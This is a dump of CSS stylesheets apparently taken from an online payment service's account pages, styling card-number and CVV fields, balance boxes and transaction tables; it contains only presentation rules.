h2{position:absolute;top:0;left:-500em;width:1px;height:1px;overflow:hidden;text-indent:-9999em;line-height:0}.cardstack.stacked .card,.cardstack.stacked .header{position:absolute;top:0;left:-999em;margin:0}.cardstack.stacked .card.top{position:relative;top:0;left:0;border:1px solid #ccc}.cardstack.stacked .top .body p,.cardstack.stacked .top .body div,.cardstack.stacked .top .body ul,.cardstack.stacked .top .body ol{margin:.9em}.cardstack.stacked.vertical{overflow:hidden;border:1px solid #ccc;background:#e8f1fa}.cardstack.stacked.vertical .card{float:left;width:80%}.cardstack.stacked.vertical .card.top{float:left;border:none;background:#fff}.cardstack.stacked.vertical .card.top .header{position:static!important;height:.01em;overflow:hidden}.cardstack.stacked.vertical .top .body{padding:0 .1em}.datatable{margin:1.667em 0;border:1px solid #ccc;padding:0 1px}.datatable label{display:inline}.datatable select{font-size:11px}.datatable input.button{margin-right:0}.btnLink{border:none;padding:0;background:transparent;color:#369;cursor:pointer}.datatable .title,.datatable .filters,.datatable .actions,.datatable .pagination{overflow:hidden;border-top:1px solid #fff;border-bottom:1px solid #d2d6d9;padding:5px 10px}.datatable .title{background:#eaeef2 url(/en_US/i/pui/table_title_bg.gif) top left repeat-x}.datatable .filters{background:#eaeef2}.datatable .actions,.datatable .pagination{background:#fff url(/en_US/i/pui/cont_grey_30.gif) bottom left repeat-x}.datatable .filters,.datatable .actions,.datatable .pagination{font-size:.9em}.datatable .filters p,.datatable .actions p,.datatable .actions ul,.datatable .pagination p{display:inline;margin:0}.datatable .title h3{float:left;margin:0}.datatable .title h3 span{font-size:.9em;font-weight:400}.datatable .title p{float:left;margin:0 0 0 1em;font-size:.9em}.datatable .title p.options{float:right}.datatable .filters p.view{float:left}.datatable .filters p.search{float:right}.datatable .actions div{float:left}.datatable .actions p{float:right}.datatable .actions li{display:inline;margin:0;border-right:1px solid #ccc;padding:0 5px;list-style-type:none}.datatable .actions li.first{padding-left:0}.datatable .actions li.last{border-right:none}.datatable .pagination{border-bottom:none;text-align:center}.datatable .pagination p.results{float:left}.datatable .pagination p.info{float:right}.datatable .pagination p.info span.page{margin-left:1em;border-left:1px solid #ccc;padding:0 1em}.datatable .pagination p.info input.text{width:2em}.datatable table{width:100%;margin:2px 0 0;border-top:1px solid #eee;border-bottom:1px solid #eee}.datatable tr th{border-right:1px solid #ccc;border-bottom:1px solid #eee;padding:5px 10px;background-color:#e8f1fa;font-weight:400;font-size:.9em;text-align:left;vertical-align:bottom}.datatable tr th.selected{background-color:#d1e3f7}.datatable tr th.last{border-right:none}.datatable tr th a{padding-right:10px;color:#333;background:url(/en_US/i/btn/btn_grey_dwn_arrow.gif) right center no-repeat;text-decoration:none}.datatable tr th a:hover,.datatable tr th a:focus{text-decoration:underline}.datatable tr th.selected a{background-image:url(/en_US/i/btn/btn_blue_up_arrow.gif)}.datatable table .cur_val{text-align:right}.datatable tr td{border-top:1px solid #eee;padding:5px 10px}.datatable tr.secondary td{border-top:none}.datatable .txn_num{display:none}div#pplite.loading{height:inherit;background:#fff url(/en_US/i/icon/icon_animated_prog_42wx42h.gif) no-repeat center}div#pplite{background:url(/en_US/i/pui/lightbox/bg.gif) repeat-x scroll left bottom #FFF}div#pplite_c.lightbox div#pplite.loading{padding-top:212px}div#pplite_c{width:300px}div#pplite_c.lightbox{width:400px}div#pplite.yui-panel div#countryLang select{margin-top:5px;width:100%}fieldset#rosetta .flag{display:inline}fieldset#rosetta .flag img{top:3px;right:3px;position:relative}a#widgetOpener{display:inline;font-size:.9em;text-decoration:none}div#pplite div#countryLang div.header{display:none}div#pplite_c.lightbox div#countryLang div.header{display:block;margin-bottom:1em}div#pplite_c.lightbox div.underlay{height:100%}a#widgetOpener img{padding-left:5px;padding-bottom:3px}a#widgetOpener span{text-decoration:underline}div#pplite_c.lightbox div.yui-panel{padding:30px 100px 0 20px}div#pplite.yui-panel .container-close{position:absolute;top:5px;right:5px;z-index:6;visibility:inherit;width:15px;height:15px;margin:0;padding:0;background:url(/en_US/i/pui/lightbox/close.gif) no-repeat;cursor:pointer}span.buttonAsLink{text-decoration:underline;color:#084482}span.buttonAsLink input{text-align:left;margin:0;padding:0;height:1.4em;color:#084482;background-color:transparent;text-decoration:underline;border:none;cursor:pointer;overflow:visible}span.buttonAsLink.disable{color:#ccc}span.buttonAsLink.disable input.disable{color:#ccc;cursor:default}span.buttonAsLink input.small{width:auto;font-size:.9em}span.buttonAsLink input::-moz-focus-inner{padding:0}.acResults{z-index:12;position:absolute;overflow:hidden;background-color:#fff;border:1px solid #ccc}.acResults ul{overflow-y:auto;margin:0;padding:0;list-style:none}.acResults li{margin:0;padding:4px}.acResults li.active{background-color:#fec;cursor:pointer}.splitBtn{position:relative;float:left;width:100%;height:1.6em;overflow:visible;margin-top:0!important;margin-left:0!important;padding:0;font-size:1em}.splitBtn.small{font-size:.9em}.splitBtn ul{position:absolute;top:0;left:0;margin:0!important;padding:0;list-style-type:none}.splitBtn ul li{margin:0;padding:0}.splitBtn ul li a{display:block;padding:0 .5em;border-right:1px solid #ccc;border-left:1px solid #ccc;background:#fff;color:#000;text-decoration:none;line-height:1.6em}.splitBtn ul li.primaryItem a{padding:0 1em;border-top:1px solid #bfbfbf;border-right:0 solid #e1e1e1;border-bottom:1px solid #8f8d8e;background:#e1e1e1 url(../objects/btn_bg_sprite.gif) 0 -192px repeat-x}div.splitBtn.prepOpen ul li.primaryItem a,div.splitBtn.menu.listOpen ul li.primaryItem a{border-top:1px solid #dcc6a1;border-right:0 solid #8f8d8e;border-bottom:1px solid #925d0f;background:#ffa822 url(../objects/btn_bg_sprite.gif) 0 18% repeat-x}.splitBtn ul.open li.secondaryItem a:hover,.splitBtn ul.open li.secondaryItem a:active,.splitBtn ul.open li.secondaryItem a:focus{z-index:3;background:#feeecc}.splitBtn span.listArrow{position:absolute;top:0;z-index:2;display:block;border-left:1px solid #8f8d8e;border-top:1px solid #bfbfbf;border-right:1px solid #8f8d8e;border-bottom:1px solid #8f8d8e;background:#e1e1e1 url(/en_US/i/pui/core/icon_button_arrows_sprite.gif) 0 0 no-repeat}.splitBtn.small span.listArrow{background:#e1e1e1 url(/en_US/i/pui/core/icon_button_arrows_sprite.gif) 0 -23px no-repeat}.splitBtn.menu span.listArrow{border-left:0 solid #8f8d8e;background:#e1e1e1 url(/en_US/i/pui/core/icon_button_arrows_sprite.gif) 0 -123px no-repeat}.splitBtn.small.menu span.listArrow{background:#e1e1e1 url(/en_US/i/pui/core/icon_button_arrows_sprite.gif) 0 -146px no-repeat}div.splitBtn.prepOpen span.listArrow,div.splitBtn.listOpen span.listArrow{z-index:3;border-top:1px solid #dcc6a1;border-bottom:1px solid #925d0f;background:#ffa822 url(/en_US/i/pui/core/icon_button_arrows_sprite.gif) no-repeat 0 -62px}div.splitBtn.small.prepOpen span.listArrow,div.splitBtn.small.listOpen span.listArrow{z-index:3;background:#ffa822 url(/en_US/i/pui/core/icon_button_arrows_sprite.gif) no-repeat 0 -84px}div.splitBtn.menu.prepOpen span.listArrow{background:#ffa822 url(/en_US/i/pui/core/icon_button_arrows_sprite.gif) no-repeat 0 -185px}div.splitBtn.menu.small.prepOpen span.listArrow{background:#e1e1e1 url(/en_US/i/pui/core/icon_button_arrows_sprite.gif) no-repeat 0 -207px}div.splitBtn span.listArrow{outline:none}div.listOpen{z-index:3}div.splitBtn.menu.listOpen span.listArrow,div.splitBtn.menu.listOpen span.listArrow:active{background:#e1e1e1 url(/en_US/i/pui/core/icon_button_arrows_sprite.gif) 0 -185px no-repeat}div.splitBtn.menu.small.listOpen span.listArrow,div.splitBtn.menu.small.listOpen span.listArrow:active{background:#e1e1e1 url(/en_US/i/pui/core/icon_button_arrows_sprite.gif) 0 -207px no-repeat}div.listOpen.prepOpen span.listArrow{z-index:4;background:#ffa822 url(/en_US/i/pui/core/icon_button_arrows_sprite.gif) no-repeat 0 -62px}.rtl ul li,.rtl ol li,.rtl ol ul li{margin-right:1.25em;margin-left:0;padding-right:.2em;padding-left:0}.ngCaptcha{clear:both;overflow:hidden}.ngCaptcha span{display:block;width:140px}.ngCaptcha span a{background:url(/en_US/i/icon/audiorefresh.png) no-repeat;padding-left:20px;display:block}.ngCaptcha span a.ngAudio{background-position:-166px 0;margin-right:20px}.ngCaptcha span.leftFloat{float:left}.ngCaptcha noscript{background:url(/en_US/i/icon/audiorefresh.png) no-repeat;padding-left:20px}.ngCaptcha .transparentButton{margin-top:10px}@media print{body{margin:0;padding:0;color:#000;background:#fff;font:75%/1.2em Arial,sans-serif}h1,h2,h3,h4{line-height:1em;color:#000!important}h1{font-size:1.5em}h2{font-size:1.333em}h3{font-size:1.167em}h4{font-size:1em}a{color:#03f;text-decoration:underline!important}a img{border:0}p{margin:1em 0}ul,ol,dl{margin:1em 0;padding:0}dt{margin:0;padding:0}li,dd{margin:0 0 0 1.7em}em{font-style:italic}strong{font-weight:700}dfn,var{font-style:normal}code,kbd,samp{font:1em "Courier New",Courier,monospace}q:before,q:after{content:""}cite{font-style:normal}cite span{display:block}abbr,acronym{border:none;color:#333;text-decoration:underline;cursor:pointer}form{margin:0;padding:0}legend{padding:0;font-weight:700}label{display:block}input,select,textarea{border:1px solid #999;font:1.1em Arial,Helvetica,sans-serif}input,textarea{padding:2px}input[type=checkbox],input.checkbox{border:none}input[type=radio],input.radio{border:none}button,input.button{width:auto!important;border:1px solid #bbb;border-right-color:#999;border-bottom-color:#999;color:#000;background:#eee}button.primary,input.button.primary{background-color:#FFA822;background-image:none}table{border-collapse:collapse!important;border:1px solid #000!important;width:98%}table th,table td{border-collapse:collapse;border-bottom:1px solid #999!important;padding:5px}.review table th{padding-right:5px;text-align:right}#navFull{display:none}#navPrimary *{background-image:none!important}#navPrimary ul{margin:0 0 1em;padding:0}#navPrimary ul li{display:none}#navPrimary ul li.active{display:inline;margin:0;padding:0}#navPrimary ul li.active a{color:#999;text-decoration:none!important}#navPrimary ul li.active a:after{content:" > "}#navPrimary ul ul{display:inline}#navPrimary ul li.active ul li{display:none}#navPrimary ul li.active ul li.active{display:inline;padding-left:.5em}#navPrimary ul li.active ul li.active a{color:#000;font-size:1.167em}#navPrimary ul li.active ul li.active a:after{content:""}#navPrimary ul ul ul{display:none}#page #content.sideposleft #main,#page #content.sideposright #main,#page #content.sideposleft #sidebar,#page #content.sideposright #sidebar{float:none}div.messageBox{padding:0 12px;background-color:#fff!important;background-image:none!important;font-weight:700}div.messageBox ul,.legacyErrors div.messageBox ul{position:relative;height:auto;width:auto;left:0;top:0;text-indent:0;overflow:visible;line-height:1em}.doNotPrint{display:none}.accessAid,.balloonCallout,.balloon{display:none}#navGlobal,#searchForm,#rosetta{display:none}#footer *{display:none}.cont{background-image:none!important;background-color:#fff!important}#footer #legal,#footer #legal *{display:block}} 2 | form #cc_number_old{background-image:url(../icon/sprites_cc_global.png);background-position:142px 86.8%;background-repeat:no-repeat;padding-right:35px} 3 | form #cc_number_old.valid.visa{background-position:142px -.5%} 4 | form #cc_number_old.valid.mastercard{background-position:142px 6%} 5 | form #cc_number_old.valid.amex{background-position:142px 12%} 6 | form #cc_number_old.valid.diners_club_international{background-position:142px 24%} 7 | form #cc_number_old.valid.jcb{background-position:142px 31%} 8 | form #cc_number_old.valid.discover{background-position:142px 18.3%} 9 | form #cc_number_old.valid.maestro{background-position:142px 37%} 10 | form #cvv2_number_old{background-image:url(../icon/sprites_cc_global.png);background-position:50px 93%;background-repeat:no-repeat;padding-right:40px} 11 | form #cvv2_number_old.amex{background-position:50px 99.2%} -------------------------------------------------------------------------------- /myaccount/css/pageSalsa.css: -------------------------------------------------------------------------------- 1 | div.messageBox {margin-bottom:20px; clear:both} 2 | .welcome div.messageBox {margin-bottom:10px;} 3 | div.alert {clear:both; margin-top:10px; padding:5px 5px 5px 10px; height:1%; background-image:none;} 4 | div.alert p {margin:0;} 5 | div.alert p a {margin-left:0px;} 6 | div.alert p a.links {margin-left:0px;} 7 | div.alert img {float:right; cursor:pointer;} 8 | div.colorGroupA {border:#c33 1px solid; padding:10px; background-color:#ffece6;} 9 | div.colorGroupB {border:#996 1px solid; background-color:#ffc;} 10 | div.colorGroupC {border:#a6a6a6 1px solid; background-color:#e6e6e6;} 11 | div.colorGroupD {border:#a6a6a6 1px solid; background-color:#eee;} 12 | 13 | .balloonCallout, .balloon {padding:0 !important; word-wrap:break-word; float:left;} 14 | .balloonCallout ul, .balloonCallout ul li, .balloon .body ul, .balloon .body ul li {margin:0 !important; list-style-type:none;} 15 | .balloon .body ul li.flagHover {border-bottom:1px solid #CCC; padding-top:10px; padding-bottom:10px;} 16 | .balloon .body ul li.flagHoverLast {padding-top:10px; padding-bottom:10px;} 17 | .balloon .body ul li a {border-bottom:none; text-decoration:underline;} 18 | .balloon .body p.note {border-bottom:1px solid #ccc; padding-bottom:12px;} 19 | 20 | .welcome #headline {overflow:auto} 21 | .welcome #headline h2 {margin-bottom:8px;} 22 | .welcome #headline .metadata{overflow:auto;} 23 | .welcome #headline .metadata li {padding-right:0.6em;padding-left:0;line-height:1.3em;white-space:nowrap; display:block; float:left;} 24 | .welcome #headline .metadata li.accTypeList {margin-right:0.5em; padding-right:0.4em;} 25 | .welcome #headline .metadata li.metaDataFirst {padding-left:0;} 26 | .welcome #headline p.secondary {margin:0;} 27 | .welcome #headline div.secondary {float:right;line-height:1.3em;} 28 | .welcome .globalMessage {margin-top:10px; border:1px solid #cfb893; padding:5px 10px; background-color:#fec;} 29 | .welcome .globalMessage p {margin:0;} 30 | .welcome #content {overflow:visible;} 31 | .welcome .layout2c {clear:both; overflow:visible; height:1%; padding-top:9px; outline:none;} 32 | #stdpage.welcome .layout2c .first {width:630px;} 33 | 34 | #AXCILightBox h3 {color:#C88039;} 35 | #AXCILightBox form#AXCILightBoxForm div.buttons {height:1%; overflow:auto; margin-top:20px;} 36 | #AXCILightBox .footer {padding:0px;} 37 | 38 | .welcome div.messageBox ul{position:static; width:auto; height:auto; overflow:inherit; margin:0; text-indent:0; line-height:16px;} 39 | .welcome #mpi580022 {margin-bottom:10px;} 40 | .welcome #mpi560002 {clear:both; overflow:auto; height:1%; width:100%; margin-bottom:2px;} 41 | .welcome .first .single .mpi #mpi560002 {margin-bottom:5px;} 42 | .welcome .first .box {height:1%; overflow:auto; margin-bottom:10px; border:1px solid #ccc; padding:7px 9px 2px 10px; background:url(../objects/src_ao_bluebg_1x300.gif) repeat-x bottom;} 43 | .welcome .first .box .head {height:1%; overflow:auto; padding-top:2px; padding-bottom:10px;} 44 | .welcome .first .box .head h3 {float:left; font-size:1em;} 45 | .welcome .first .box .head span.small {float:left;position:relative;top:3px;padding-left:5px;} 46 | .welcome .first .box .head p {display:inline; margin:0 1px 0 15px;} 47 | .welcome .first .box .links {float:right; margin:0 1px; font-size:0.9em;} 48 | .welcome .first .box .giftbody {clear:both; overflow:auto; height:1%;} 49 | .welcome .first .box .body {clear:both; overflow:auto; height:1%; border-top:1px solid #e0e0e0; padding-top:8px;} 50 | .welcome .first .box .body p {margin:0;} 51 | .welcome .first .box ul {margin:0;} 52 | .welcome .first .box ul li {margin:0 0 6px 0; padding-left:0; list-style-type:none;} 53 | .welcome .first .box ul li.mpi {clear:both; overflow:auto; height:1%; margin-bottom:3px;} 54 | .welcome .first .box .negative {color:#C00;} 55 | .welcome .first .box li.resNegBal {display:inline; margin-left:5px;} 56 | .welcome .first .box ul.giftbalanceList {margin-bottom:2px;} 57 | .welcome .first .box ul li.pendingbalance {margin:4px 0 3px 0;} 58 | 59 | .welcome .first .single ul {margin-bottom:6px; overflow:auto; height:1%;} 60 | .welcome .first .single ul li {margin-bottom:0;} 61 | .welcome .first .single ul li.balance {float:left;} 62 | .welcome .first .box ul li.singleBalance {float:left; margin-bottom:2px;} 63 | .welcome .first .box ul li.balance, #jcbApply label {display:inline;} 64 | .welcome .first .box span.balance, .welcome .first .box ul li.balance span.balance, .welcome .first .box ul li.singleBalance span.balance {font-size:1.3em;} 65 | .welcome .first .box ul li.info {float:left; margin-left:7px; margin-top:5px; margin-bottom:0;} 66 | .welcome .first .box ul li.links {float:right; margin-top:5px;} 67 | .welcome .first .box .next {clear:both; margin-top:-3px; margin-bottom:8px;} 68 | .welcome .first .box .next a.small {margin-left:7px;} 69 | .welcome .first .multi .head ul.links {margin-top:4px;} 70 | .welcome .first .multi img {margin-top:2px; margin-right:5px; vertical-align:text-top;} 71 | .welcome .first .multi .body p {margin-bottom:8px;} 72 | .welcome .first .multi .body h3 {font-size:1em;} 73 | .welcome .first .multi table.basic {clear:both; overflow:auto; height:1%; width:500px; margin:0.15em 1.4em 0.55em 0; float:left;} 74 | .welcome .first .multi table.basic th.textright {text-align:right;} 75 | .welcome .first .multi table.narrow {clear:both; overflow:auto; height:1%; align:inherit; width:300px; margin:0.15em 1.4em 0.55em 0; float:left;} 76 | .welcome .first .multi .links li {display:inline; padding-left:5px;} 77 | .welcome .first .multi .links li.end {border-left:1px solid #ccc; margin:0 1px 0 2px;} 78 | .welcome .first .multi li.total {margin-bottom:4px; padding-top:4px;} 79 | .welcome .first .multi p.toggler {margin:0 0 10px 0;} 80 | .welcome .first .multi p#collapseGift, .welcome .first .multi p#collapseGiftLink, .welcome .first .multi p#collapse {display:inline; margin-bottom:6px; margin-left:6px; white-space:nowrap;} 81 | .welcome .first .multi p#expand, .welcome .first .multi p#expandGift {display:inline; margin-bottom:6px; margin-left:7px; white-space:nowrap;} 82 | .welcome .first .multi p .autoTooltip {margin:0; color:#000; font-size:1em;} 83 | .welcome .first .multi ul.giftbalanceList {clear:both; overflow:auto; height:1%; margin-top:1px;} 84 | .welcome .first .multi li.secondary {display:inline; margin-left:4px;} 85 | .welcome .first .box li.deposit {border-left:1px solid #ccc; padding-left:8px;} 86 | .welcome .first .box li.deposit a {margin-left:4px;} 87 | .welcome .first .multi div p.next {clear:both; overflow:auto; height:1%; margin-top:0px !important; margin-bottom:4px;} /* margin-bottom:6px;*/ 88 | .welcome .first .multi div.giftbody p.next {margin-bottom:5px;} 89 | .welcome .first .box .giftbody, .welcome .first .box .body {padding-bottom:3px;} 90 | .welcome .first .box ul.balanceManagerList {clear:both; overflow:auto; height:1%; margin-bottom:8px;} 91 | .welcome .first .box ul.balanceManagerList li {float:left; margin-top:-4px; margin-bottom:0;} 92 | .welcome .first .box ul.balanceManagerList li span {margin-left:6px; margin-right:6px; color:#ccc;} 93 | .welcome .first .box ul.balanceManagerList li.learnMore span {margin-left:7px; margin-right:7px;} 94 | .welcome .first .box ul.balanceManagerList li.learnMore a {float/*\**/:right\9;} 95 | .welcome .first .box ul.balanceManagerList li.learnMore a {*float:none;} 96 | .welcome .first .box ul.balanceManagerList li.small {margin-top:-2px; margin-left:7px;} 97 | .welcome .first .box li.balanceMgrSec {clear:both; overflow:auto; height:1%; padding-top:1px; margin-bottom:0;} 98 | .welcome .first .box li.balanceMgrSec ul.balanceManagerList {margin-bottom:2px;} 99 | .welcome .first .box li.balanceMgrSec ul.balanceManagerList li {margin-top:0;} 100 | .welcome .first .box li.balanceMgrSec ul.balanceManagerList li.small {margin-top:1px;} 101 | .welcome .first .box ul.balanceMgrTable {padding-top:1px; margin-bottom:3px;} 102 | .welcome .first .box ul.balanceMgrTable li {margin-top:0;} 103 | .welcome .first .box ul.balanceMgrTable li.small {margin-top:1px;} 104 | 105 | .welcome .financeInfo .body img {float:left; margin-top:4px; margin-right:10px} 106 | .welcome .financeInfo .links a {padding-left:8px;} 107 | .welcome .financeInfo .body {clear:both; border-top:1px solid #e0e0e0; padding-top:8px; padding-bottom:7px;} 108 | .welcome .financeInfo .body img.processingImg{float:none;} 109 | .welcome .first .financeInfo .body p {margin:0 0 5px 0;} 110 | .welcome .first .financeInfo .body p#tempAcctMsg {float:left;width:620px;} 111 | .welcome .first .financeInfo .body p#congratsMsg {float:left;width:440px;} 112 | .welcome .financeInfo .body a.button {margin-left:8px; padding:3px 5px; line-height:1.8; font-size: 1em;} 113 | .welcome .financeInfo .body ul li {display:inline;} 114 | .welcome .first .financeInfo .body div.financeBalance {margin-left: 50px;} 115 | .welcome .first .financeInfo .body div.financeBalance p.makePayment {float: right;} 116 | .welcome .first .financeInfo .body div.financeBalance p.makePayment a {margin-right: 0px;} 117 | .welcome .first .financeInfo .body div.financeBalance p.creditPreference {margin-top: 5px;} 118 | .welcome .financeInfo .body .col1 {width:492px;} 119 | .welcome .financeInfo .body .col2 {width:179px;} 120 | .welcome .financeInfo .body #rewardInfo {float:right; padding:7px; border:2px solid #e8f1fa;} 121 | .welcome .financeInfo .body #rewardInfo .points {margin-right:8px; color:#757575; font-size:1.125em; font-weight:bold;} 122 | .welcome .financeInfo .body .cleared {clear:both;} 123 | .welcome .financeInfo .footer {clear:both; border-top:1px solid #e0e0e0; padding-top:6px; padding-bottom:12px;} 124 | .welcome .financeInfo .footerEU {border-top:1px solid #e0e0e0;} 125 | .welcome #PPCreditwidget ol.itcreditsec {padding:0;margin:0.6em;} 126 | .welcome #PPCreditwidget ol.itcreditsec li {padding:0;margin:0 1.2em;} 127 | 128 | /*Styles for BML Widget on Salsa AO Page */ 129 | .welcome .bmlFinanceInfo .body span.spacer {padding:0 5px 0 5px;} 130 | .welcome .bmlFinanceInfo .body li#bmlLinks {clear:both; float:left; padding-top:10px;} 131 | .welcome .bmlFinanceInfo .body li#paymentBtn {float:right; padding-top:10px;} 132 | .welcome .bmlFinanceInfo .body img#bmlLogo {float:left; margin:0 12px 0 0;} 133 | .welcome .bmlFinanceInfo .body div#paymentInfo {float:left; width:550px;} 134 | .welcome .bmlFinanceInfo .body #bmlError {color:#c60000;} 135 | .welcome .first .bmlFinanceInfo .body p.bmlFirstTime {margin:0 0 5px 96px;} 136 | .welcome .first .bmlFinanceInfo .body p {margin:0 0 5px 0;} 137 | .welcome .bmlFinanceInfo .body a.button {margin-left:8px; padding:3px 5px; line-height:1.8; font-size: 1em;} 138 | .welcome .bmlFinanceInfo .body ul li {display:inline;} 139 | .welcome .bmlFinanceInfo .body p#ifxFailMsg {color:#757; text-align:center;} 140 | .welcome .bmlFinanceInfo div#defMsg {clear:both; margin:0;} 141 | div.loadingImageTable {background-color:#fff; text-align:center;} 142 | 143 | #studentAccounts .viewport {position:relative; float:left; width:628px; overflow:hidden;} 144 | #studentAccounts dl {position:relative; top:0; left:0; width:843px; margin:0; padding:0; line-height:2;} 145 | #studentAccounts dt {float:left; padding:0 3px 0 0; white-space:nowrap;} 146 | #studentAccounts dt a.balloonControl {border:none; padding-right:3px;} 147 | #studentAccounts dt.suspended a {color:#f00;} 148 | #studentAccounts dt.firstItem {border:none; margin-left:0; padding-left:0;} 149 | #studentAccounts dd {float:left; white-space:nowrap; margin-left:0;} 150 | #studentAccounts dd span {margin-left:6px; margin-right:7px; color:#ccc;} 151 | #studentAccounts .rightBtn, #studentAccounts .leftBtn {display:block; cursor:pointer;width:14px; height:14px;} 152 | #studentAccounts .rightBtn {float:right; margin:6px 0 0 6px; background:url(/en_US/i/icon/icon_calarrow_right_12x13.gif) no-repeat;} 153 | #studentAccounts .leftBtn {float:left; margin:6px 5px 0 0; background:url(/en_US/i/icon/icon_calarrow_left_12x13.gif) no-repeat;} 154 | #studentAccounts .disabled {background:url(/en_US/i/icon/icon_calarrow_left_g12x13.gif) no-repeat;} 155 | #studentAccounts .rdisabled {background:url(/en_US/i/icon/icon_calarrow_right_g12x13.gif) no-repeat;} 156 | #studentAccounts .head {padding-top:1px; padding-bottom:10px;} 157 | #studentAccounts .body {padding-top:7px;} 158 | 159 | .welcome .last .box {margin-bottom:10px; border:1px solid #ccc;} 160 | .welcome .last .box h3 {margin:0; padding:5px 10px; background-color:#e8f1fa; font-size:1em;} 161 | .welcome .last .box ul {margin:0; padding:10px 10px 0 0;} 162 | .welcome .last .box ul li {margin-left:2em; list-style-type: none;} 163 | .welcome .last .box ul ul {margin-left:-10px; padding:0;} 164 | .welcome .last .box ul ul li a {color:#cd3333;} 165 | .welcome .last .box p {padding-left:10px;} 166 | .welcome .last .MktMPI {margin-bottom:10px;} 167 | 168 | .welcome .header {overflow:auto; height:1%; margin-bottom:5px; padding-top:6px;} 169 | .welcome .header .links {float:right; margin:0 1px;} 170 | .welcome .header h3 {font-size:1em; float:left;} 171 | .welcome .header h3 span{padding-left:10px; font-weight:normal;} 172 | .welcome .header #alertImage {float:left; display:none; cursor:pointer;} 173 | .welcome .header p.next {clear:both; margin:0;} 174 | .welcome .aofilters {float:left; margin:0; padding:0;} 175 | .welcome .aofilters, .welcome ul.aofilters li {display:inline; list-style-type:none;} 176 | .welcome .aofilters li {margin:0; padding:0; margin-right:6px; padding-right:8px; border-right:1px solid #999; color:#336699;} 177 | .welcome .aofilters li.selected {padding-left:0; color:#333;} 178 | .welcome .aofilters .lastfilter {border-right:none; padding-right:0;} 179 | .welcome .aofilters .floatLi {float: right;width: 120px;display: block;} 180 | .welcome .MktMPI a {outline:none;} 181 | .welcome #main .MktMPI a img {margin-right:0;} 182 | #stdpage .datatable .last {width:auto;} 183 | 184 | .datatable {clear:both; margin-top:0;} 185 | .datatable div {padding:5px;} 186 | .datatable div p {margin:0 !important;} 187 | .datatable .title {overflow:visible; height:15px;} 188 | .datatable .title h3, .datatable .title h3 span {font-size:1em;} 189 | .datatable .title #alertImage {float:left; display:none; margin-left:10px; cursor:pointer;} 190 | .datatable .title .print {float:right; padding:0 8px 0 0; border-right:1px solid #333;} 191 | .datatable .title .noSeperator {border-right:none; padding:0;} 192 | .datatable .title .print a {color:#336699;} 193 | .datatable .title .downloadWidget, #rightTextDownload, #noScriptDownload {padding:0;} 194 | .datatable .title .downloadWidget {float:right; padding-left:8px;} 195 | .datatable .replicaMessage {clear:both; height:1%; overflow:auto; background-color:#ffc;} 196 | .datatable .title, .datatable .actions, .datatable .fraudInfo, .datatable .moreTransactions, .datatable .replicaBottomMessage {padding:8px 6px;} 197 | .datatable .pagination {padding:6px;} 198 | .datatable .noMessage {height:15px;} 199 | .datatable .replicaAlert #replicaClose {float:right; display:none; cursor:pointer; padding-top:3px;} 200 | .datatable .replicaAlert p {float:left; width:100%;} 201 | .datatable .fraudInfo {border-top:1px solid #fff; border-bottom:#ccc 1px solid; background-color:#eaeef2;} 202 | .datatable .fraudInfo label {padding-right:10px;} 203 | .datatable .fraudInfo select {margin-right:15px;} 204 | .datatable .pagination {clear:both; background:#eaeef2; border-bottom:1px solid #d2d6d9;} 205 | .datatable .pagination p.info span.page {margin-left:0px; padding:0 16px 0 8px; border-left:1px solid #333; background:transparent url(/en_US/i/btn/btn_arrow_next_11x11.gif) no-repeat scroll right 2px;} 206 | .datatable .pagination p.info span.pageNext {padding:0 16px 1px 0; background:transparent url(/en_US/i/btn/btn_arrow_next_11x11.gif) no-repeat scroll right 2px;} 207 | .datatable .pagination p.info span{background:transparent url(/en_US/i/btn/btn_arrow_previous_11x11.gif) no-repeat scroll left 2px; padding:0 8px 0 16px;} 208 | .datatable .pagination p.info span.first .btnLink{margin:0 8px 0 0;} 209 | .datatable .pagination p.info span.first {margin-right:8px; border-right:1px solid #333; padding-right:0; } 210 | .datatable .pagination p.info span.disabledNext {float:right; padding-right:13px; color:#CCC; background:url(/en_US/i/icon/icon_graynext_11x11.gif) no-repeat right;} 211 | .datatable .paginationBottom, .datatable .actionsBottom {border-bottom:none;} 212 | .datatable .actions {background:#f7fbfe;} 213 | .datatable .actions input {float:left;} 214 | .datatable .actions a {margin-left: 10px;} 215 | .datatable .actions a.statusTypesPopup {float:right; color:#336699; padding-top:2px;} 216 | .datatable .tableWrapper {overflow-x:auto; overflow-y:hidden; padding:0;} 217 | .datatable .divExtendPadding {padding-bottom:15px;} 218 | .datatable .divExtendRefundPadding {padding-bottom:25px;} 219 | .datatable table {border-collapse:separate; margin-top:1px; border-bottom:1px solid #D2D6D9;} 220 | .datatable tr th {border-bottom:1px solid #ccc;} 221 | .datatable tr td {border-top:none;} 222 | .datatable tr td.tall {height:42px} 223 | .datatable tr.alternateRow td {background-color:#F3F3F3;} 224 | .datatable tr td, .datatable tr th {vertical-align:top; padding:5px;} 225 | .datatable tr td.selectColumn, .datatable tr th.selectColumn {padding-left:6px;} 226 | .datatable input.archiveCheck {width:13px; height:14px; margin:0px; border:none;} 227 | .datatable tr td.imageCell a{display: inline-block; font-size: 1px; height: 11px; line-height: 1px; margin-top: 2px; text-decoration: none; width: 11px;} 228 | .datatable tr td.dateInfo a, .datatable tr td.flagInfo a {color:#333; text-decoration:none;} 229 | .datatable tr td.noResults {padding:38px 10px; text-align:center;} 230 | .datatable tr td.dateInfo {padding-left:0px;} 231 | .datatable tr td.orderStatus a {text-decoration:underline;} 232 | .datatable tr td.orderStatus a.button {padding:1px 7px; text-decoration:none; display:inline-block; white-space:normal; margin-right:0px;} 233 | .datatable a.button:hover {border:1px solid #d5bd98; background:#ffa822 url(/en_US/i/pui/core/btn_bg_submit.gif) left center repeat-x;} 234 | .datatable .moreTransactions {clear:both; border-bottom:#ccc 1px solid; text-align:right;} 235 | .datatable .moreTransactions span {display:block;} 236 | .datatable .moreTransactions span input {text-decoration:underline;} 237 | .datatable tr.rowFocusColor td {background-color:#ffeecc;} 238 | .datatable #replicaAlertWrapper {clear:both; height:1%; overflow:auto; padding:8px 6px; background-color:#EAEEF2; border-bottom:1px solid #CCC;} 239 | .datatable .titleReplicaStyle {border-bottom:none; padding-bottom:0;} 240 | .datatable .replicaBottomMessage {border-bottom:1px solid #D2D6D9;} 241 | .history .datatable .titleReplicaStyle {height:18px;} 242 | .datatable .spacer {clear:both; background:#eaeef2; padding:16px;} 243 | 244 | .datatable tr.tabHeader td{background:#FFEECC; padding-bottom:8px;} 245 | .datatable td.tabDivider{height:2px; padding:0px; background:#C8CDD0; font-size:1px; line-height:1px;} 246 | .datatable tr.tabSecondary 